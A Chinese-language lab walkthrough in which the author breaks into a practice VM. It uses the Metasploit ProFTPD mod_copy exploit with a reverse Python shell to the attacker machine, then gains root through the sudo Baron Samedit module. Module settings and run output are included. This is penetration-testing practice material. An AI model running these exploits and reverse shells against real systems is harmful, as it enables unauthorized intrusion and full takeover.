# 靶场搭建

直接下载后导入,使用 NAT 模式

IP: 192.168.1.130

# 信息初收集

21/tcp open  ftp
80/tcp open  http

ftp 空口令登录什么的都没有,80 端口敏感目录收集没有信息。

就两个端口,那就要进一步做指纹识别

21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

FTP 的版本查了一下是有漏洞的,而且 msf 上就有利用模块。

# 渗透过程

# proftpd_modcopy_exec

metasploit 直接 gank

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options 

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.130    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                         cs/using-metasploit.html
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www/html    yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The system shell to use


Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5



View the full module info with the info, or info -d command.

run 一下拿到 shell

# 提权

搜索一下提权的模块: msf6 exploit(unix/ftp/proftpd_modcopy_exec) > search priv platform:linux ubuntu

使用 62 号

msf6 exploit(linux/local/sudo_baron_samedit) > show options 

Module options (exploit/linux/local/sudo_baron_samedit):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on
   WritableDir  /tmp             yes       A directory where you can write files.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  2255             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 192.168.1.129:2255 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.9.5 is a vulnerable build.
[*] Writing '/tmp/KZd7d.py' (2797 bytes) ...
[*] Writing '/tmp/libnss_tY8/0zE.so.2' (548 bytes) ...
[*] Sending stage (3045380 bytes) to 192.168.1.130
[+] Deleted /tmp/KZd7d.py
[+] Deleted /tmp/libnss_tY8/0zE.so.2
[+] Deleted /tmp/libnss_tY8
[*] Meterpreter session 2 opened (192.168.1.129:2255 -> 192.168.1.130:42417) at 2024-04-30 00:17:02 -0400

meterpreter > getuid
Server username: root
meterpreter > 

直接拿到了 root 权限

# 小结

metasploit 赛高!

需要总结下 Linux 环境下的提权方式。